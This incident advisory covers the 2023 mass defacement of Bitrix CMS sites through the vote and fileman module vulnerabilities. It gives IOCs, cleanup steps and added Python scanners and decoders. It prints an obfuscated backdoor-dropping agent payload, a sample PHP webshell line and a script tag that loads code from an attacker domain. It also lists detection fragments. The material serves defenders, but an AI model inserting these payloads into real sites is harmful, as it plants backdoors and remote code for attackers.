Mass defacement of .RF websites

On May 26, 2023, a mass defacement hit web servers in the .RF national segment of the Internet. The target of the attack was the Bitrix CMS.

The investigation showed that the attack had been prepared in advance: preparation had been under way since 2022 through known vulnerabilities, including CVE-2022-27228 (see the technical description on the developer forum). This may be the largest attack on the .RF national segment in its history.

The company CyberOK has released a report describing the attack and explaining the actions needed to remove the backdoor from the server, close the Bitrix vulnerabilities and restore the application. It also gives recommendations for securing the web application.


Back in July 2022, the National Computer Incident Coordination Center (NCCC) warned of the threat of infection of Bitrix-managed sites through the 0-day vulnerability CVE-2022-27228, known since March 3, 2022.

On March 11, 2022, the developer promptly fixed the vulnerability, updating the vote module to version 21.0.100 and the CMS itself to version 22.0.400.

Unfortunately, some system administrators did not receive this information or ignored it.

▍ Vulnerability exploitation

The vulnerability in the Bitrix vote module allows a remote attacker to write arbitrary files to the server by sending specially crafted network packets.

According to the NCCC description from March 2022, the attacker later used these files to infect the browsers of website visitors.

  1. After exploiting the vulnerability, the attacker uploads a modified file (/bitrix/modules/main/include/prolog.php) containing an added line (https://techmestore[.]pw/jqueryui.js) that loads the third-party JS script jquery-ui.js.
  2. When a user visits an infected Bitrix-managed site, a JS script is injected into the user’s browser cache; it is loaded from various directories of the site, for example:

    • bitrix/js/main/core/core.js?1656612291497726
    • bitrix/js/main/core/core.js?1656598434497824
    • bitrix/templates/cm_main/js/jquery-1.10.2.min.js

An attacker could use either infection vector, or both at once.

So far, we have not observed such exploitation of the vulnerability. Unlike previous attacks, in May 2023 the vulnerability was used not to redirect users to third-party sites but to deface the site and install a backdoor (see below).

In 2023, in addition to the vote module, the attackers also used the fileman service module, which implements a visual HTML editor. This module contains a vulnerable script, html_editor_action.php. Exploiting this file’s vulnerability, similar to CVE-2022-27228, allows an unauthorized attacker to remotely execute arbitrary code on the target system.

After successful exploitation of this vulnerability, the log will contain a line with a successful POST request to the file /bitrix/tools/html_editor_action.php, like this:

***POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 ***
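A small log check for the line above, written as an added example for this post (it is not from CyberOK, NCCC or the Bitrix project). It parses access-log lines in the common Apache/nginx "combined" layout, which is an assumption about the server's log format, and reports only successful POSTs to the vulnerable script; the sample lines are constructed and use documentation-range IP addresses. A hit is a lead to be correlated with file modification times and the source address, not proof of compromise on its own.

```python
import re

# Apache/nginx "combined" access-log layout (assumption about the server's log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoint named in the post as the fileman module's vulnerable script.
VULN_ENDPOINT = "/bitrix/tools/html_editor_action.php"


def find_exploitation_hits(lines):
    """Return (ip, timestamp, path, status) for every successful POST to the vulnerable script."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected layout; skip it
        path = m.group("path").split("?", 1)[0]  # drop any query string before comparing
        if m.group("method") == "POST" and path == VULN_ENDPOINT and m.group("status") == "200":
            hits.append((m.group("ip"), m.group("time"), path, int(m.group("status"))))
    return hits


# Constructed sample log lines (not real traffic); 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.10 - - [26/May/2023:03:14:07 +0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [26/May/2023:03:14:09 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 12 "-" "python-requests/2.28"',
    '198.51.100.7 - - [26/May/2023:03:15:01 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 403 199 "-" "curl/7.88"',
    '198.51.100.7 - - [26/May/2023:03:15:30 +0300] "GET /bitrix/tools/html_editor_action.php HTTP/1.1" 200 0 "-" "curl/7.88"',
]


def scan_sample():
    """Run the check over the constructed sample; only the second line should match."""
    return find_exploitation_hits(SAMPLE_LOG)


if __name__ == "__main__":
    for ip, when, path, status in scan_sample():
        print(f"{when} {ip} POST {path} -> {status}")
```

To run it against a real server, replace SAMPLE_LOG with the lines of the web server's access log (for example `open("/var/log/nginx/access.log")`); a request that was rejected (403) or a plain GET is deliberately not reported, since the post ties successful exploitation to a POST answered with 200.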

▍ Description of the 2023 attack

Main actions after the hack:

  • index.php in the root directory of the web application is replaced;
  • malicious code is embedded in the PHP scripts of modules;
  • the file /bitrix/.settings.php is deleted;
  • Agent scripts with malicious code are created, or existing scripts are modified;
  • data is removed from the database tables b_iblock, b_iblock_element, b_iblock_element_property;
  • .htaccess files are created in all directories of the web application;
  • PHP scripts with arbitrary file names are created in the directory /bitrix/admin/.

▍ Necessary actions after infection

According to the NCCC recommendations, after infection you must perform the following actions:

  • Update Bitrix to the current version, at least 22.0.400.
  • Check the website for malicious JS code. For example, you can install “1C-Bitrix: Search for Trojans” from the catalog of ready-made solutions and start a scan. To do this, open the site control panel and go to the following tab:

    • Settings → bitrix.xscan → Search and Search (beta)

    The module will scan the entire site and display the identified suspicious files.

    Based on the current attack, the following indicators of compromise have been identified:

    Pay attention to files with a randomly generated name from the character set [a-z0-9] in the directory /bitrix/admin/ and in the root directory of the site.

    The following files were found:

    • /bitrix/admin/f408f2b7df70.php
    • /bitrix/admin/8f1c222aae51.php
    • /2469a41bac71.php
    • /98826/bfd99.php

    If malicious code is detected, measures must be taken to remove it and to check the system for compromise.

  • Check for illegitimate file modifications using a command that finds and sorts changed and new files from the last 30 days, excluding the last day:
    find /home/<path to your Bitrix folder>/public_html -type f -mtime -30 ! -mtime -1 -printf '%TY-%Tm-%Td %TT %p\n' | sort -r

For example, if you check the file bitrix/modules/fileman/admin/fileman_html_editor_action.php, you will see the following:

“Bad” code

“Good” code

In addition to creating new files, attackers may embed malicious code into existing files. It can be found by searching for the following fragments:

  • str_rot13
  • md5($_COOKIE
  • bitrixxx
  • eval(base64_decode
  • BX_STAT
  • BX_TOKEN
  • parse_str(hex2bin
  • iasfgjlzcb
  • QlhfVE9LRU4=
  • gzinflate(base64_decode
  • C.A.S
  • urldecode(base64_decode(hex2bin

The following files must be excluded from the search results for str_rot13:

  • /bitrix/modules/main/classes/general/vuln_scanner.php
  • /bitrix/modules/main/lib/search/content.php
  • bitrix/modules/socialnetwork/lib/item/logindex.php
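The checks described above (randomly named PHP files in /bitrix/admin/ and the site root, the code fragments to search for, the str_rot13 exclusions, and the domains listed under IOC) as one scanner. This is an added example, not a tool from the post, from CyberOK or from the Bitrix project. The minimum name length of 8 and the requirement that a name contain both letters and digits are heuristics chosen here to match the names observed in the post; the sample "site" is a constructed dict, not real Bitrix code.

```python
import os
import re

# Code fragments listed in the post as signs of injected code.
MALICIOUS_FRAGMENTS = [
    "str_rot13", "md5($_COOKIE", "bitrixxx", "eval(base64_decode", "BX_STAT", "BX_TOKEN",
    "parse_str(hex2bin", "iasfgjlzcb", "QlhfVE9LRU4=", "gzinflate(base64_decode", "C.A.S",
    "urldecode(base64_decode(hex2bin",
]

# Domains from the post's IOC section, written without the defanging brackets so they match file contents.
IOC_DOMAINS = ["otrasoper.ga", "techmestore.pw", "unasinob.cf"]

# Legitimate Bitrix files that use str_rot13 and must be excluded from that search (from the post).
STR_ROT13_ALLOWLIST = {
    "bitrix/modules/main/classes/general/vuln_scanner.php",
    "bitrix/modules/main/lib/search/content.php",
    "bitrix/modules/socialnetwork/lib/item/logindex.php",
}

# Random-looking names: lowercase alphanumerics with at least one letter and one digit, 8+ chars.
# The length and mixed-character requirements are heuristics for this example, not from the post.
RANDOM_NAME_RE = re.compile(r"^(?=.*[a-z])(?=.*[0-9])[a-z0-9]{8,}\.php$")
WATCHED_DIRS = ("", "bitrix/admin")  # site root and /bitrix/admin/, as named in the post


def suspicious_name(relpath):
    """True for a random-looking .php name directly inside one of the watched directories."""
    directory, name = os.path.split(relpath.strip("/"))
    return directory in WATCHED_DIRS and bool(RANDOM_NAME_RE.match(name))


def matched_fragments(relpath, text):
    """Fragments and IOC domains present in the file, honouring the str_rot13 allow-list."""
    rel = relpath.strip("/")
    found = []
    for frag in MALICIOUS_FRAGMENTS:
        if frag == "str_rot13" and rel in STR_ROT13_ALLOWLIST:
            continue
        if frag in text:
            found.append(frag)
    found += [d for d in IOC_DOMAINS if d in text]
    return found


def scan_files(files):
    """files: mapping of relative path -> file text. Returns {relpath: [reasons]} for flagged files."""
    report = {}
    for rel, text in files.items():
        reasons = []
        if suspicious_name(rel):
            reasons.append("random-looking file name")
        reasons += ["contains " + f for f in matched_fragments(rel, text)]
        if reasons:
            report[rel] = reasons
    return report


def scan_tree(root):
    """Walk a real site directory (PHP, JS and .htaccess files) and run scan_files over it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.endswith((".php", ".js")) or n == ".htaccess":
                full = os.path.join(dirpath, n)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[rel] = fh.read()
    return scan_files(files)


# Constructed sample site (not real Bitrix code): a dropped file, an allow-listed file, an injected
# loader line in prolog.php, and a clean admin script.
SAMPLE_SITE = {
    "bitrix/admin/f408f2b7df70.php": "<?php eval(base64_decode($_POST['x'])); ?>",
    "bitrix/modules/main/lib/search/content.php": "<?php $s = str_rot13($text); ?>",
    "bitrix/modules/main/include/prolog.php": "<?php echo '<script src=\"https://techmestore.pw/jqueryui.js\"></script>'; ?>",
    "bitrix/admin/agent_list.php": "<?php echo 'agents'; ?>",
}

if __name__ == "__main__":
    for path, reasons in scan_files(SAMPLE_SITE).items():
        print(path, "->", ", ".join(reasons))
```

On a real server call `scan_tree("/path/to/public_html")`; every flagged file still needs to be read by a person, since fragments such as `str_rot13` or `BX_TOKEN` can appear in legitimate code beyond the three allow-listed files.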

On the page listing 1C-Bitrix Agents (/bitrix/admin/agent_list.php) you can check the called functions for malicious code. To do this, open the site control panel and go to the tab Settings → Product settings → Agents.

The agent name can be anything, but it is usually easy to spot visually, as in the lead image of the post:

After restoring the site or database from a backup, the recommendations are as follows:

  • restrict administrative access to the CMS and, if present, to FTP and MySQL;
  • check the functions called by agents (/bitrix/admin/agent_list.php) for malicious code. Example of a modified agent:

    $arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%d6%24%a7%d4%23%95%75%a5%43%d4%d6%d4%d6%65%44%f4%97%55%d6%95%c6%65%74%f4%97%15%75%e4%23%55%d6%d4%53%15%44%a5%43%d4%74%a5%a6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%')));
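To understand what a modified agent like the one above does without running it, the obfuscation layer (strrev followed by urldecode) can be undone offline. The decoder below is an added example and not code from the post, from CyberOK or from the Bitrix project; it reverses the string, percent-decodes it, and pulls out the PHP path literal that the decoded code writes to. The payload string is the one quoted in the agent above; the inner base64 blob is reported but deliberately left undecoded here.

```python
import re
from urllib.parse import unquote_to_bytes


def decode_strrev_urlencode_layer(payload):
    """Undo eval(urldecode(strrev('...'))) statically: reverse, then percent-decode. Nothing is executed."""
    return unquote_to_bytes(payload[::-1]).decode("latin-1")


def dropped_paths(php_source):
    """Quoted .php path literals in decoded PHP (e.g. the target of file_put_contents)."""
    return re.findall(r'"(/[^"]+\.php)"', php_source)


def is_strrev_eval(code):
    """Signature of this agent modification: eval(urldecode(strrev(...)))."""
    return re.search(r"eval\s*\(\s*urldecode\s*\(\s*strrev\s*\(", code) is not None


# Obfuscated string from the agent shown in the post.
AGENT_PAYLOAD = (
    "b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%d6%24%a7%d4%23%95%75%a5%43%d4%d6%d4%d6%65%44%f4%97%55%d6%95%c6%65%74%f4%97%15%75%e4%23%55%d6%d4%53%15%44%a5%43%d4%74%a5%a6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%"
)
AGENT_CODE = "$arAgent[\"NAME\"];eval(urldecode(strrev('" + AGENT_PAYLOAD + "')));"


def decode_agent():
    """First layer of the agent payload as PHP source text."""
    return decode_strrev_urlencode_layer(AGENT_PAYLOAD)


def analyse_agent():
    """Summary a responder would want: signature match, what the code calls, where it writes."""
    decoded = decode_agent()
    return {
        "signature": is_strrev_eval(AGENT_CODE),
        "call": decoded.split("(", 1)[0],
        "paths": dropped_paths(decoded),
        "uses_base64_decode": "base64_decode(" in decoded,
    }


if __name__ == "__main__":
    for k, v in analyse_agent().items():
        print(f"{k}: {v}")
```

The decoded layer is a single file_put_contents() call that writes a base64-decoded blob under the document root, so the path it returns is the dropped backdoor to look for and remove; the same function handles any other agent built on the same strrev/urldecode trick.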

Recommendations for securing websites:

▍IOC

otrasoper[.]ga/help/?23211651614614
techmestore[.]pw
unasinob[.]cf
core.js?1656612291497726 — d74272539fc1c34fa5db80a168269d319d8c541bb36cbf0e99233cbe7ab9474d
core.js?1656598434497824 — da9c874d43fc94af70bc9895b8154a11aab1118a4b5aefde4c6cee59f617707e
jquery-1.10.2.min.js — 0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988

Note. In some cases, the site may be blocked by the NCCC due to the placement of illegal content on the hacked site, or due to its use by attackers to conduct computer attacks on critical infrastructure, in accordance with Article 5 of Federal Law No. 187-FZ “On the Security of the Critical Information Infrastructure of the Russian Federation”, paragraph 5.1 of the Order of the FSB of Russia dated July 24, 2018 No. 366 and paragraph 9 of the Rules for the Centralized Management of the Public Communications Network, approved by the Decree of the Government of the Russian Federation of February 12, 2020 No. 127.



After a defacement, text appears on the site that can lead to blocking by the NCCC due to the placement of illegal content

The block remains in place until the NCCC confirms that the illegal content has been removed.

In this case, after removing the backdoor and fixing the vulnerabilities, you must contact the team of the National Coordination Center for Computer Incidents (NCCC).
